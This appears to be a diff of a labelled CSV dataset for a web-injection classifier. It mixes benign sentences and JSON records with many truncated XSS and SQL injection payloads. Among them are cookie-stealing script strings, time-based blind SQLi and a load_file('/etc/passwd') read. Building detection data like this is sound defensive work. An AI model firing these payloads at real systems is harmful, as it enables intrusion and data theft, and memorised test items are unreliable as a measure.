count ( * ) from sysuse,2,SQLi,19363 -If you are moving items you can select the destina,0,normal,26050 -1,0,normal,26671 -"<image draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,6722 -Select the perfect dress for the event.,0,normal,24227 -select,0,normal,26609 -"1"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,12687 -"<style>@keyframes x{}</style><content style=""anima",1,XSS,8265 -"<col onpaste=""alert(1)"" contenteditable>test</col>",1,XSS,7694 -"-3116"" ) ) ) union all select 4600,4600,4600,4600-",2,SQLi,19523 -"<address onmouseup=""alert(1)"">test</address>",1,XSS,8326 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,14719 +<ul id=x tabindex=1 onfocusin=alert(1)></ul>,1,XSS,8432 +"<tbody onmouseout=""alert(1)"">test</tbody>",1,XSS,4920 +"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%",1,XSS,5904 +<keygen id=x tabindex=1 ondeactivate=alert(1)></ke,1,XSS,8289 +1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr,2,SQLi,20646 +Select Settings > Back up & syncand toggle Back up,0,normal,25611 +<ruby onpointermove=alert(1)>XSS</ruby>,1,XSS,5659 +"1 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 )",2,SQLi,16130 +1%' ) ) ( select ( case when ( 4587 = 4587 ) then ,2,SQLi,22484 +<map onfocusout=alert(1) tabindex=1 id=x></map><in,1,XSS,5910 +"<img onmousemove=""alert(1)"">test</img>",1,XSS,7376 +1' in boolean mode ) and ( select 2* ( if ( ( sele,2,SQLi,19365 +"If you have never used down pillows before, the fo",0,normal,26047 +1,0,normal,26668 +"<style>@keyframes x{}</style><wbr style=""animation",1,XSS,6724 +Select a recipe to try out.,0,normal,24229 +select,0,normal,26606 +1%' and 7533 = 7533 and '%' = ',2,SQLi,12689 +<hr onpointerleave=alert(1)>XSS</hr>,1,XSS,8267 +<applet onblur=alert(1) tabindex=1 id=x></applet><,1,XSS,7696 +1 where 6304 = 6304,2,SQLi,19525 +<textarea id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,8328 "{""id"":null,""name"":""effort""}",0,normal,27524 --9795 ) as wrgs where 5427 = 5427 union all select,2,SQLi,12266 -select * from users where id = '1' union select ( ,2,SQLi,11422 -"<dl draggable=""true"" ondrag=""alert(1)"">test</dl>",1,XSS,1827 -1' ) as yqld where 2489 = 2489,2,SQLi,21933 -"1"" ) ) as osuh where 8809 = 8809",2,SQLi,12330 +"-5243"" where 2105 = 2105 or 4144 = ( select upper ",2,SQLi,12268 +1 or pg_sleep ( __TIME__ ) --,2,SQLi,11424 +<div onpointerout=alert(1)>XSS</div>,1,XSS,1828 +"-5160' ) union all select 8067,8067,8067,8067,8067",2,SQLi,21935 +"1' where 7104 = 7104 union all select null,null,nu",2,SQLi,12332 `'><script>\xE3\x80\x80javascript:alert(1)</script,1,XSS,561 -<hgroup onfocusout=alert(1) tabindex=1 id=x></hgro,1,XSS,4108 -Carefully select a wine.,0,normal,24820 -<frame id=x tabindex=1 ondeactivate=alert(1)></fra,1,XSS,5436 -<svg><i onload=alert(1)></i>,1,XSS,4438 -waitfor delay '00:00:05'--,2,SQLi,10383 -"1"" and 8407 = ( select count ( * ) from generate_s",2,SQLi,17827 -Select your leader.,0,normal,24838 -<footer id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,4407 -"{""id"":null,""firstName"":""Cindy"",""lastName"":""Kong"",""",0,normal,26985 -"select * from generate_series ( 3086,3086,case whe",2,SQLi,18074 -Let's decide where to spend the summer vacation.,0,normal,23959 -admin') or '1'='1,2,SQLi,9918 -"Do such effects generalize, or only pertain to a s",0,normal,26236 -"1"" ) and 2006 = 2006",2,SQLi,22347 -1'+ ( select brgo where 9100 = 9100 or 4240 = ( se,2,SQLi,18881 -1' ) ) ) and 8407 = ( select count ( * ) from gene,2,SQLi,15097 -"<thead draggable=""true"" ondrag=""alert(1)"">test</th",1,XSS,2818 -1'|| ( select 'mzsy' where 4940 = 4940 or elt ( 58,2,SQLi,16725 --7561 ) as ilrm where 8828 = 8828 or 5903 = ( 'qqp,2,SQLi,18793 -Tinder Select has been around for almost six month,0,normal,25284 -"<style>@keyframes slidein {}</style><small style=""",1,XSS,5783 -"-4983%"" ) or 4747 = dbms_utility.sqlid_to_sqlhash ",2,SQLi,20961 -"1 ) and row ( 6237,7469 ) > ( select count ( * ) ,",2,SQLi,16164 -"1"" ) as jngl where 8384 = 8384 and 4580 = 1718--",2,SQLi,20110 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19170 -<script>self['alert'](2)</script>,1,XSS,9716 -UNION ALL SELECT NULL#,2,SQLi,10700 -{},0,normal,26800 -1' ) where 5317 = 5317 and 8407 = ( select count (,2,SQLi,17397 --8933 ) as iiyr where 1974 = 1974 union all select,2,SQLi,21665 -"<noframes onmousemove=""alert(1)"">test</noframes>",1,XSS,4896 -Where's the nearest Starbucks?,0,normal,23506 -Where should we go for our weekend trip?,0,normal,22934 -"1"" ) ) and exp ( ~ ( select * from ( select concat",2,SQLi,20422 -Tavistock was governed from before the Conquest by,0,normal,25499 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4110 +Select your dream.,0,normal,24822 +"<article onmousedown=""alert(1)"">test</article>",1,XSS,5438 +"<style>@keyframes x{}</style><th style=""animation-",1,XSS,4440 +"benchmark(50000000,MD5(1))",2,SQLi,10385 +1 ) ) as kgit where 1919 = 1919 and char ( 109 ) |,2,SQLi,17829 +Select your goal.,0,normal,24840 +<svg><font onload=alert(1)></font>,1,XSS,4409 +"{""id"":null,""firstName"":""Luke"",""lastName"":""Yiin"",""s",0,normal,26982 +"1%"" ) ) ) rlike ( select * from ( select ( sleep (",2,SQLi,18076 +Where can I select a wine for the dinner party?,0,normal,23961 +admin') or '1'='1'#,2,SQLi,9920 +Don't forget to select rugs and carpet that emit l,0,normal,26233 +1' ) where 6746 = 6746 procedure analyse ( extract,2,SQLi,22349 +"-9451%"" ) union all select 9963,9963,9963--",2,SQLi,18883 +1 ) ) as bjxd where 4299 = 4299,2,SQLi,15099 +"<sub draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,2819 +1'|| ( select 'allj' where 7334 = 7334,2,SQLi,16727 +1%' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 12,2,SQLi,18795 +"To capture the entire screen, select Command+Shift",0,normal,25281 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5785 +1'+ ( select 'swxi' where 7651 = 7651 and 6414 = (,2,SQLi,20963 +1' ) as wnys where 6457 = 6457 or 8514 = benchmark,2,SQLi,16166 +1%' ) or 8421 = ( select count ( * ) from generate,2,SQLi,20112 +"-6381%"" or 8571 = 8571--",2,SQLi,19172 +<x oncut=alert(1)>cut this!,1,XSS,9718 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10702 +"{""id"":16436,""name"":""jmeter test <DO NOT DELETE""}",0,normal,26797 +"-1015"" ) ) union all select 6624,6624#",2,SQLi,17399 +1'|| ( select 'puco' where 2605 = 2605 union all s,2,SQLi,21667 +"<frame onmouseleave=""alert(1)"">test</frame>",1,XSS,4898 +Where's the museum?,0,normal,23508 +Merge the financial accounts for analysis.,0,normal,22936 +select ( case when ( 2576 = 7563 ) then 2576 else ,2,SQLi,20424 +"Select ""Custom Image"" from with the Media Player a",0,normal,25680 "<a href=""javas cript:alert(1)"">XSS</a>",1,XSS,149 -"1%"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,16670 -1'+ ( select 'kcix' where 1117 = 1117,2,SQLi,18753 -"<th onkeydown=""alert(1)"" contenteditable>test</th>",1,XSS,8556 -1%' ) ) ( select ( case when ( 4587 = 4587 ) then ,2,SQLi,22484 -"1"" ) ) as zval where 2255 = 2255 or ( select * fro",2,SQLi,15464 -column,0,normal,23155 -<animatemotion onpointerenter=alert(1)>XSS</animat,1,XSS,4444 -"<style>@keyframes x{}</style><script style=""animat",1,XSS,7447 +"1' union all select null,null,null,null,null,null,",2,SQLi,16672 +"1' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4",2,SQLi,18755 +"<sup draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8558 +hi or a = a,2,SQLi,22486 +1' ) ) as bsvk where 5985 = 5985 and extractvalue ,2,SQLi,15466 +trigger,0,normal,23157 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4446 +url(javascript:alert(''),1,XSS,7449 <svg><xss onload=alert(1)>,1,XSS,237 -"1"" ) and 7533 = 7533 and ( ""yqzq"" = ""yqzq",2,SQLi,15902 -"{""id"":null,""name"":""Aurochs""}",0,normal,27061 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10755 -"<param oncontextmenu=""alert(1)"">test</param>",1,XSS,7124 -"Available in Playback Mode, the D-Lighting functio",0,normal,26337 -"union select 1,load_file('/etc/passwd'),1,1,1;",2,SQLi,10124 -"-7860' ) ) ) union all select 7420,7420,7420,7420,",2,SQLi,13712 -"<dl draggable=""true"" ondragend=""alert(1)"">test</dl",1,XSS,3084 -"<style><img src=""</style><img src=x onerror=javasc",1,XSS,633 -datetime,0,normal,23198 -1' ) ) as ticp where 9794 = 9794 union all select ,2,SQLi,18878 -"<style>@keyframes x{}</style><big style=""animation",1,XSS,2666 -TechCrunch and Facebook will select four judges fo,0,normal,25498 -The Real Estate Select Sector SPDR Fund (XLRE) ros,0,normal,25385 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10527 -1 ) ) as mgvw where 4923 = 4923 union all select n,2,SQLi,15837 -"benchmark(10000000,MD5(1))#",2,SQLi,10061 -"-2116%' ) ) ) union all select 7119,7119,7119,7119",2,SQLi,14789 -"select * from users where id = 1 or 1#""{ union sel",2,SQLi,12076 -The crowds of men who merely spoke the Greek and L,0,normal,25464 -"-5227"" union all select 2666--",2,SQLi,20596 -"1' ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x71",2,SQLi,14110 -<scr<script>ipt>alert('XSS')</scr<script>ipt>,1,XSS,9687 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,20259 -"1"" ) as wehx where 5744 = 5744",2,SQLi,19202 -When you select the computer that seems to fit you,0,normal,25141 -<menuitem id=x tabindex=1 onfocusin=alert(1)></men,1,XSS,5250 -<audio onpointerover=alert(1)>XSS</audio>,1,XSS,8534 -"<small oncut=""alert(1)"" contenteditable>test</smal",1,XSS,7427 -1' ) ) ( select ( case when ( 4587 = 4587 ) then r,2,SQLi,12346 -"Select a category—in this case, ""Check-in & Redemp",0,normal,25664 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7980 -word1,0,normal,26533 -; alert(document.cookie); var foo=',1,XSS,1736 -Let's choose a book for our reading group.,0,normal,23782 -select ( case when ( 6839 = 2730 ) then 6839 else ,2,SQLi,14485 -"<u onmouseout=""alert(1)"">test</u>",1,XSS,4256 -We have now to select such portion of this system ,0,normal,25175 -"<form onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,2476 +"-5013' ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,15904 +"{""id"":null,""firstName"":""Penny"",""lastName"":""Tan"",""s",0,normal,27058 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10757 +<image3 onpointerup=alert(1)>XSS</image3>,1,XSS,7126 +Be sure the toys you select are suitable for babie,0,normal,26334 +exec(@s),2,SQLi,10126 +1' ) where 2928 = 2928,2,SQLi,13714 +"<hgroup onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,3085 +"<style><img src=""</style><img src=x onerror=javasc",1,XSS,633 +year,0,normal,23200 +"1"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch",2,SQLi,18880 +"<frameset onkeyup=""alert(1)"" contenteditable>test<",1,XSS,2667 +That additional money goes to select charities sup,0,normal,25495 +The role of Select midfield powerhouse is filled a,0,normal,25382 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10529 +"-9054"" ) as rgyu where 3792 = 3792 order by 1--",2,SQLi,15839 +1) or pg_sleep(__TIME__)--,2,SQLi,10063 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,14791 +select * from users where id = 1 <@1$ or 1 = 1 -- ,2,SQLi,12078 +The depth of snow will determine the size of the s,0,normal,25461 +"-3074' ) ) union all select 6131,6131,6131,6131,61",2,SQLi,20598 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,14112 +<img src=x onerror=alert('XSS');>,1,XSS,9689 +1' ) ) and 5556 = ( select count ( * ) from all_us,2,SQLi,20261 +"-6118 union all select 5906,5906,5906,5906,5906#",2,SQLi,19204 +When: Select dates between April 21 and July 29 (s,0,normal,25138 +<q onpointerout=alert(1)>XSS</q>,1,XSS,5252 +"<style onmouseup=""alert(1)"">test</style>",1,XSS,8536 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7429 +"-9859"" ) ) ) union all select 6595,6595,6595,6595,",2,SQLi,12348 +"{""id"":null,""name"":""happened""}",0,normal,27588 +"<style>@keyframes x{}</style><option style=""animat",1,XSS,7982 +where,0,normal,26530 +foo\'; alert(document.cookie);//';,1,XSS,1737 +Let's find out where the farmer's market is.,0,normal,23784 +"1%' ) and extractvalue ( 7982,concat ( 0x5c,0x7171",2,SQLi,14487 +"<plaintext draggable=""true"" ondragenter=""alert(1)""",1,XSS,4258 +"We need to reflect, select, revise, and edit, whil",0,normal,25172 +"<time onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,2477 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10759 "{""id"":null,""firstName"":""志源"",""lastName"":",0,normal,27596 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3714 -<set onpointerdown=alert(1)>XSS</set>,1,XSS,6705 -1 ) ) as oqyo where 7995 = 7995,2,SQLi,18189 -1' where 6135 = 6135,2,SQLi,17092 -from,0,normal,26519 -<meter id=x tabindex=1 ondeactivate=alert(1)></met,1,XSS,5190 -Or remain a niche market available only in select ,0,normal,25806 -"1' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7655",2,SQLi,21857 -1' where 9583 = 9583 and 5319 = 7670#,2,SQLi,16457 -1' where 7353 = 7353 or 8156 = ( select count ( * ,2,SQLi,14211 -<input type=checkbox id=x onfocusin=alert(1)>,1,XSS,7844 -"-1438 where 6759 = 6759 union all select 6759,6759",2,SQLi,12641 -1' and 9254 = ( select count ( * ) from rdb$fields,2,SQLi,14053 --4615' or 4493 = utl_inaddr.get_host_address ( chr,2,SQLi,13032 -"{""id"":null,""name"":""subject""}",0,normal,27153 -"1"" union all select null,null#",2,SQLi,21486 -"<video draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,6765 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10794 -"<script>crypto.generateCRMFRequest('CN=0',0,0,null",1,XSS,1126 -"1"" ) where 5850 = 5850 or updatexml ( 1808,concat ",2,SQLi,17626 -"{""id"":null,""firstName"":""Chan"",""lastName"":""Sung"",""s",0,normal,27260 -"-6014"" or make_set ( 3003 = 2609,2609 )",2,SQLi,18734 -"x' and 1 = ( select count ( * ) from tabname ) , -",2,SQLi,11544 -Sort the color-coded folders on your desk.,0,normal,22987 -rollback,0,normal,23165 -"<content oncopy=""alert(1)"" contenteditable>test</c",1,XSS,4359 -"-4166%"" ) union all select 5190--",2,SQLi,14115 -"1%' ) union all select null,null,null#",2,SQLi,17728 +"<sub onkeyup=""alert(1)"" contenteditable>test</sub>",1,XSS,3716 +<rtc id=x tabindex=1 onfocusin=alert(1)></rtc>,1,XSS,6707 +1' in boolean mode ) and 6055 = ctxsys.drithsx.sn ,2,SQLi,18191 +1' and 6414 = ( select count ( * ) from rdb$fields,2,SQLi,17094 +from,0,normal,26516 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5192 +Or select a Medicare Advantage plan that includes ,0,normal,25803 +1'+ ( select 'tzyz' where 4912 = 4912 or 6979 = li,2,SQLi,21859 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,16459 +1%' ) ) ) and 3916 = 6327--,2,SQLi,14213 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7846 +"1"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex (",2,SQLi,12643 +1 ) where 4710 = 4710 procedure analyse ( extractv,2,SQLi,14055 +"-9725' ) union all select 2481,2481,2481,2481,2481",2,SQLi,13034 +"{""id"":null,""firstName"":""Jamus"",""lastName"":""Kwek"",""",0,normal,27151 +"-8695 union all select 6087,6087,6087,6087,6087,60",2,SQLi,21488 +<button id=x tabindex=1 onactivate=alert(1)></butt,1,XSS,6767 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10796 +"<svg xmlns=""#""><script>alert(1)</script></svg>",1,XSS,1127 +-2361' ) ) as mzhv where 2905 = 2905 or 9026 = 538,2,SQLi,17628 +"{""id"":null,""name"":""Marsh Frog""}",0,normal,27258 +1%' or sleep ( 5 ) #,2,SQLi,18736 +"select * from users where id = 1 or ""?,"" or 1 = 1 ",2,SQLi,11546 +Select a scenic view for your landscape.,0,normal,22989 +grant,0,normal,23167 +"<style>@keyframes x{}</style><samp style=""animatio",1,XSS,4361 +"1%"" ) ) and char ( 107 ) ||char ( 121 ) ||char ( 9",2,SQLi,14117 +1' rlike ( select ( case when ( 6855 = 1056 ) then,2,SQLi,17730 "{""id"":null,""name"":""major continued""}",0,normal,27601 -"1"" or sleep ( 5 ) #",2,SQLi,21401 -<style>:target {color:red;}</style><mark id=x styl,1,XSS,7422 -Select your fail.,0,normal,25017 -<b id=x tabindex=1 onbeforedeactivate=alert(1)></b,1,XSS,6653 -1' ) where 4003 = 4003,2,SQLi,17485 -"<div id=d><x xmlns=""><iframe onload=alert(97)""></d",1,XSS,9161 -Let's find out where the art exhibition is.,0,normal,23712 -"<code onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,7623 +"1"" ) ) or 6793 = ( select 6793 from pg_sleep ( 5 )",2,SQLi,21403 +<li id=x tabindex=1 ondeactivate=alert(1)></li><in,1,XSS,7424 +Select your stumble.,0,normal,25019 +<a onpointerout=alert(1)>XSS</a>,1,XSS,6655 +1' ( select ( case when ( 4587 = 4587 ) then regex,2,SQLi,17487 +"<div style=""background:url(test5.svg)"">PRESS ENTER",1,XSS,9163 +Where's the best place to enjoy the beach?,0,normal,23714 +"<strong onkeypress=""alert(1)"" contenteditable>test",1,XSS,7625 "&lt;XSS STYLE=\""behavior&#58; url(xss&#46;htc);\""&",1,XSS,988 -1' ) ) rlike sleep ( 5 ) and ( ( 'qitl' like 'qitl,2,SQLi,16015 -"<listing onmouseout=""alert(1)"">test</listing>",1,XSS,2853 -select * from users where id = 1 -@<@ union select,2,SQLi,11696 -"<body oncontextmenu=""alert(1)"">test</body>",1,XSS,8854 -"-1975"" union all select 8638,8638,8638,8638,8638,8",2,SQLi,16337 -"1"" ) ) or ( select * from ( select ( sleep ( 5 ) )",2,SQLi,14997 -1%' ) ) and ( 8853 = 9924 ) *9924 and ( ( '%' = ',2,SQLi,17015 --2504' ) ) ) or 8723 = 9715,2,SQLi,17634 -"1"" ) and 8312 = dbms_pipe.receive_message ( chr ( ",2,SQLi,19564 -"1%"" ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70",2,SQLi,16867 -<button onResizeEnd=javascript:alert(1)>,1,XSS,9655 -"<br onmousedown=""alert(1)"">test</br>",1,XSS,3041 --8701%' ) ) or ( 4843 = 1690 ) *1690 and ( ( '%' =,2,SQLi,16036 -"<hr ondblclick=""alert(1)"">test</hr>",1,XSS,5011 -Now the majestic soprano Jessye Norman is joining ,0,normal,25860 -Where's your SQL experience?,0,normal,23385 -<picture onblur=alert(1) tabindex=1 id=x></picture,1,XSS,3274 -"<command onmousemove=""alert(1)"">test</command>",1,XSS,7228 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3684 -Select wine.,0,normal,23059 -"<ol draggable=""true"" ondragend=""alert(1)"">test</ol",1,XSS,6808 --5137 ) or 9323 = 9323#,2,SQLi,12338 -1'|| ( select 'iwlj' where 8704 = 8704 and ( selec,2,SQLi,22084 -"perl -e 'print \""<IMG SRC=java\0script:alert(\""XSS",1,XSS,1317 -<datalist onpointerdown=alert(1)>XSS</datalist>,1,XSS,3226 -"1 where 2292 = 2292 union all select null,null,nul",2,SQLi,17457 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21200 -The Galaxy S10 phones also support select decentra,0,normal,25439 -<script>alert(1)//INJECTX,1,XSS,9853 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5753 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10618 -"1"" ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 1",2,SQLi,16394 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4617 -"1 ) union all select null,null#",2,SQLi,19482 -"{""id"":null,""firstName"":""Kah Hong"",""lastName"":""Tan""",0,normal,26852 -Check values where necessary.,0,normal,23254 -"<div style=""x:expression((window.r==1)?'':eval('r=",1,XSS,1301 -I need to select a movie for family night.,0,normal,23670 -"1' ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,15223 -Select a cozy blanket.,0,normal,22669 -"{""id"":null,""name"":""Devimon""}",0,normal,26920 -1'+ ( select 'yjpp' where 8966 = 8966,2,SQLi,13674 -or 1=1/*,2,SQLi,9901 -<datalist onpointermove=alert(1)>XSS</datalist>,1,XSS,5496 -"1"" where 7249 = 7249 union all select null,null,nu",2,SQLi,21676 -<button onDblClick=javascript:alert(1)>,1,XSS,9601 -<u onblur=alert(1) tabindex=1 id=x></u><input auto,1,XSS,1799 -"-2312' ) ) ) union all select 5282,5282,5282,5282,",2,SQLi,12150 -<button onStart=javascript:alert(1)>,1,XSS,9668 -1 ) waitfor delay '0:0:5',2,SQLi,21588 -Select modify.,0,normal,24612 -1'+ ( select mumb where 4658 = 4658 or char ( 119 ,2,SQLi,21432 -"<footer onmousemove=""alert(1)"">test</footer>",1,XSS,6442 -"<figure draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,8637 -Select toppings.,0,normal,24490 -"-6948"" ) ) as ojjl where 1300 = 1300 or 6872 = 687",2,SQLi,15601 -1 ) ) and 8189 = ( select count ( * ) from sysibm.,2,SQLi,18744 -"{""id"":null,""name"":""forth""}",0,normal,26782 -"<h1 draggable=""true"" ondragend=""alert(1)"">test</h1",1,XSS,3655 -<link onpointerout=alert(1)>XSS</link>,1,XSS,7053 -"-2032%"" ) ) ) or ( 3082 = 7155 ) *7155 and ( ( ( """,2,SQLi,15946 -""" or pg_sleep ( __TIME__ ) --",2,SQLi,11372 -1'|| ( select 'pzoe' where 2977 = 2977 and elt ( 3,2,SQLi,15711 -"<IMG SRC=\""jav&#x0D;ascript:alert('XSS');\"">",1,XSS,1287 -1'|| ( select 'kzkr' from dual where 2778 = 2778,2,SQLi,19915 --1687 ) ) as lnva where 8396 = 8396 union all sele,2,SQLi,20830 -"<rtc onmouseup=""alert(1)"">test</rtc>",1,XSS,2138 -role,0,normal,23172 -"SLEEP(5)=""",2,SQLi,10829 -select ( case when ( 1275 = 7674 ) then 1275 else ,2,SQLi,12209 -"1 union all select null,null#",2,SQLi,12290 -"?callback=javascript:alert(1)"",",1,XSS,9874 -"1"" where 6686 = 6686 or elt ( 6272 = 6272,sleep ( ",2,SQLi,21924 -if ( 4135 = 2165 ) select 4135 else drop function ,2,SQLi,16490 -I'm considering where to go for a day trip.,0,normal,23696 --2351 ) ) as xdqn where 4019 = 4019 or 8571 = 8571,2,SQLi,13468 -<legend id=x tabindex=1 onfocusin=alert(1)></legen,1,XSS,6895 -"or ""-",2,SQLi,9885 -"<cite onmouseup=""alert(1)"">test</cite>",1,XSS,3611 -Select your contract.,0,normal,24949 -"<content ondblclick=""alert(1)"">test</content>",1,XSS,7152 -"1"" ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5",2,SQLi,17348 -<noscript id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,6013 -1' ) where 4298 = 4298,2,SQLi,13646 -1 ) ) ) and ( select * from ( select ( sleep ( 5 ),2,SQLi,14114 -<li onpointerleave=alert(1)>XSS</li>,1,XSS,4883 -"1 and make_set ( 9681 = 4703,4703 ) # zbrf",2,SQLi,16525 -1' where 8128 = 8128,2,SQLi,13077 -1'|| ( select 'tvcy' where 5592 = 5592 order by 1#,2,SQLi,12612 -0x770061006900740066006F0072002000640065006C006100,2,SQLi,12047 -<style>:target {color: red;}</style><div id=x styl,1,XSS,4147 -<table onpointermove=alert(1)>XSS</table>,1,XSS,8907 -Calculate totals where valid.,0,normal,23321 -"<rb draggable=""true"" ondragend=""alert(1)"">test</rb",1,XSS,6543 -1' ) ) ( select ( case when ( 5451 = 5451 ) then r,2,SQLi,21628 -"<style>@keyframes x{}</style><picture style=""anima",1,XSS,4432 -This plan of creating an electoral college to sele,0,normal,25297 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,16017 +<style>:target {color:red;}</style><var id=x style,1,XSS,2854 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11698 +<p onpointerdown=alert(1)>XSS</p>,1,XSS,8856 +"1"" where 3329 = 3329 or sleep ( 5 ) --",2,SQLi,16339 +1' ) ) ) and 6969 = ( select 6969 from pg_sleep ( ,2,SQLi,14999 +"1"" ) as ktnq where 9005 = 9005",2,SQLi,17017 +"1"" ) or row ( 1045,7562 ) > ( select count ( * ) ,",2,SQLi,17636 +"1"" ) ) ) and 7533 = 7533 and ( ( ( ""alvd"" like ""al",2,SQLi,19566 +1 ) ) as spdf where 8554 = 8554 or 2633 = dbms_pip,2,SQLi,16869 +<button onResume=javascript:alert(1)>,1,XSS,9657 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3042 +"1"" and ( 3020 = 3020 ) *6703 and ""itpt"" = ""itpt",2,SQLi,16038 +"<style>@keyframes x{}</style><b style=""animation-n",1,XSS,5013 +"Now, Vevo first asks you to select your favorite m",0,normal,25857 +Where's your SQL background?,0,normal,23387 +"<td draggable=""true"" ondragend=""alert(1)"">test</td",1,XSS,3276 +<br onfocusout=alert(1) tabindex=1 id=x></br><inpu,1,XSS,7230 +"<ul onkeypress=""alert(1)"" contenteditable>test</ul",1,XSS,3686 +Filter noise.,0,normal,23061 +<caption onfocusout=alert(1) tabindex=1 id=x></cap,1,XSS,6810 +"-6158"" ) union all select 3084,3084,3084,3084,3084",2,SQLi,12340 +1 ) as zbha where 9700 = 9700 or 6979 = like ( 'ab,2,SQLi,22086 +"<br size=\""&{alert('XSS')}\"">",1,XSS,1318 +"<main draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,3228 +"1 and elt ( 8853 = 1675,1675 ) -- jegm",2,SQLi,17459 +1'+ ( select 'ixvd' where 4772 = 4772 and char ( 1,2,SQLi,21202 +"The grand-duke, however, continued to pay him his ",0,normal,25436 +<marquee loop=1 width=0 onfinish=alert(1)>//INJECT,1,XSS,9855 +<menuitem id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,5755 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10620 +"-5904"" where 9782 = 9782 or 5903 = ( 'qqpjq'|| ( s",2,SQLi,16396 +"<details oncopy=""alert(1)"" contenteditable>test</d",1,XSS,4619 +1' waitfor delay '0:0:5',2,SQLi,19484 +"{""id"":null,""firstName"":""Quan"",""lastName"":""Yuan"",""s",0,normal,26849 +Calculate sums where needed.,0,normal,23256 +"alert(String.fromCharCode(88,83,83));'))"">",1,XSS,1302 +Let's explore where the forest begins.,0,normal,23672 +"-1084 where 1181 = 1181 or make_set ( 9354 = 9354,",2,SQLi,15225 +Filter the junk mail.,0,normal,22671 +"{""id"":null,""name"":""choice""}",0,normal,26917 +"-8266%' ) union all select 8626,8626,8626,8626,862",2,SQLi,13676 +admin' #,2,SQLi,9903 +"<blink ondblclick=""alert(1)"">test</blink>",1,XSS,5498 +"1%"" ) and 6537 = dbms_pipe.receive_message ( chr (",2,SQLi,21678 +<button onDrag=javascript:alert(1)>,1,XSS,9603 +<data onpointerleave=alert(1)>XSS</data>,1,XSS,1800 +select ( case when ( 8993 = 8846 ) then 8993 else ,2,SQLi,12152 +<button onStorage=javascript:alert(1)>,1,XSS,9670 +"-7248"" ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11",2,SQLi,21590 +Select fix.,0,normal,24614 +"1' where 7445 = 7445 union all select null,null,nu",2,SQLi,21434 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6444 +"<img onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,8639 +Select flavor.,0,normal,24492 +"1"" ) ) as ndbk where 5042 = 5042 and 8594 = ( sele",2,SQLi,15603 +1' ) ) ) and 6991 = 5579,2,SQLi,18746 +"{""id"":null,""name"":""Onix""}",0,normal,26779 +"<tt onmouseup=""alert(1)"">test</tt>",1,XSS,3657 +<input4 onpointerup=alert(1)>XSS</input4>,1,XSS,7055 +1'|| ( select 'lpej' from dual where 8294 = 8294 o,2,SQLi,15948 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11374 +1' ) and 2716 = ( select count ( * ) from sysusers,2,SQLi,15713 +><script>alert(0)</script>,1,XSS,1288 +"select count ( * ) from generate_series ( 